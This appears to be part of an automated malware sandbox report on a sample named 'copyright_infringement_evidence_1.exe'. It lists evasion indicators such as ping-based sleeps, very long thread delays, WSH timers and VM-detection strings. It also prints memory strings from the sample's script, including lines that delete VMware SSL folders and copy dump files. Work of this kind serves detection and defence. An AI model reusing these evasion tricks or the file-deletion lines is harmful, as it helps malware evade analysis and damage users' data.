Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 583
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4418
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 869
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2284
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7628 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 7620 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 7568 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032 Thread sleep count: 3206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep count: 1070 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep count: 3086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep count: 1123 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 3447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 Thread sleep count: 629 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep count: 780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 Thread sleep count: 1615 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524 Thread sleep count: 3211 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872 Thread sleep count: 6440 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8876 Thread sleep count: 1883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996 Thread sleep count: 896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140 Thread sleep count: 938 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144 Thread sleep count: 393 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 4418 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 1618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8244 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388 Thread sleep count: 869 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 4568 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172 Thread sleep count: 2284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.DeleteFolder(datura + "\\Global_Config\\VMware Server\\SSL");
Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VMware\*.dmp@a
Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.DeleteFolder(esporim + "\\Global_Config\\VMware Server\\SSL");
Source: wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.00000245917A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy
Source: wscript.exe, 00000019.00000003.2499893796.00000204E7C59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vMCi
Source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWawDe%SystemRoot%\system32\mswsock.dll "FileSystemRights" = [System.Security.AccessControl.FileSystemRights]
Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Global_Config\VMware Server\SSL@cNR
Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VMware\*.dmp
Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", datura + "\\Dumps\\");
Source: wscript.exe, 00000019.00000003.2501990211.00000204E7C5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vMCi
Source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751445693.000001C4CE1D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE21B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757590871.000001C4CE1D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757155199.000002459175E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", esporim + "\\Dumps\\");
Source: wscript.exe, 0000002C.00000003.2828182753.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2825381568.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2070984351.00000139D8A3D000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069859428.00000139D8A3C000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A42000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A3E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: I@\Global_Config\VMware Server\SSLcNR
